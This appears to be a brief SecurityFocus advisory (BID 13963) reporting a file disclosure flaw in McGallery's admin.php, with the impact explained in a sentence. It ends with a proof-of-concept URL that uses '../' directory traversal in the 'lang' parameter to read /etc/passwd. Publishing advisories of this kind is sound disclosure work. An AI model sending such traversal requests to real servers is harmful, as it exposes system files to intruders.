source: http://www.securityfocus.com/bid/13963/info

McGallery is prone to a file disclosure vulnerability.

This could let remote attackers access files on the computer in the context of the Web server process. 

http://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd